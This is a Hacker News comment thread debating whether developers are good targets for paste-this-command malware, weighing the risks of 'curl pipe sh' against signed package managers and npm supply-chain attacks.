Comment by drexlspivey

Comment by drexlspivey 10 months ago

14 replies

View on Hacker News

If your method of infecting your victim is having them paste and run a random command on their terminal, software developers is probably the worst group of people to be targeting.

thephyber 10 months ago

“Curl pipe sh” would like to have a word…

I think you are painting with a broad brush.

Reply View 9 replies
  • vultour 10 months ago

    This is no different from installing a random package through a package manager. If you're running "curl pipe sh" because an email told you to, that's on you.

    Reply View 8 replies
    • craftkiller 10 months ago

      No it isn't. Package managers verify the cryptographically signed package. That means the package can be built on a secure server, and then if a mirror becomes malicious or gets compromised, the malicious package won't have a valid signature so the package will not be installed. Running curl and piping it into sh means that not only could a malicious mirror or compromised server execute anything they want on your computer, but they could even send a different script when you curl it into sh vs when you view it any other way, making it much harder to detect[0].

      [0] https://web.archive.org/web/20240213030202/https://www.idont...

      Reply View 6 replies
      • dylan604 10 months ago

        I think the npm repos would like to have a word with you. Sure glad we've never had a cryptographically signed malicious package delivered via npm install

        Reply View 4 replies
      • _hyn3 10 months ago

        The tremendous number of attacks delivered via trusted package repos versus the number of widespread attacks via curl | sh (probably roughly zero) means that, theories aside, one of these is far more commonly abused than the other.

        Reply View 0 replies
    • thephyber 10 months ago

      Both are examples of developer-types doing risky things, which was my point and also supports my point that developers are not exclusively better secured than non-developer types.

      Reply View 0 replies
TheRealPomax 10 months ago

You just need a handful of people to fall for it, and a population of a hundred million daily active users on GitHub means there are always a handful of people to trick.

Reply View 0 replies
arccy 10 months ago

you'd be surprised at the quality of the average dev

Reply View 0 replies
lukan 10 months ago

My only encounter with this is, that I am annoyed if I open web dev tools on a new browser profile/guest profile, but am interrupted in my workflow because first I have to type "allow pasting" every single time. (Why I do this quite often? To be sure to have a clean state when debugging a web app) And all this, because some people cannot think, before they follow obscure instructions send to them by a untrusted party?

Why can't we have nice things again? Because of abusers yes, but also because of sheep people.

Reply View 0 replies
jeroenhd 10 months ago

Hard disagree. Developers aren't magically tech wizards, many of them will struggle to install a printer. I've seen one spend fifteen minutes on adding a keyboard layout in Windows last week (granted, the process was very unintuitive).

It's this "I'm a developer, I'm too smart to fall for phishing" mindset that makes developers an excellent target for malware.

Reply View 0 replies